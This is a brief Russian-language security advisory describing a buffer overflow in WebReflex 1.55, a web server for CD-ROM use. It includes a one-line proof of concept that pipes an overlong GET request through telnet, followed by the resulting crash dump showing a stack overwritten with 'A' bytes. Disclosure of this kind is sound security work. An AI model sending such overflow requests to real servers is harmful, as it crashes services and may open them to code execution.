WebReflex — веб сервер специально созданный для юзанья на CD-ROM’е. Уязвимость в программе позволяет переполнить один из внутренних буферов и в результате извлечь произвольный программный код.

Системы уязвимы:
WebReflex version 1.55

Пример:
$ echo «GET » `perl -e ‘print «A» x 666’` | telnet www.example.com 80
Заставит программу выйти и выдать на экран:
REFLEX16 caused a general protection fault in module KRNL386.EXE at 0001:00008aee.

Registers:
EAX=86cf0000 CS=014f EIP=00008aee
EFLGS=00000282 EBX=830f000a SS=86f7
ESP=00008d86 EBP=00008da0 ECX=0000000a
DS=0167 ESI=00009051 FS=0000 EDX=ffff8dae
ES=86ef EDI=00008c82 GS=0000
Bytes at CS:EIP:
07 1f 61 c3 06 2e 8e 06 02 00 26 89 16 f4 12 26
Stack dump:
41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141
41414141



Оставить мнение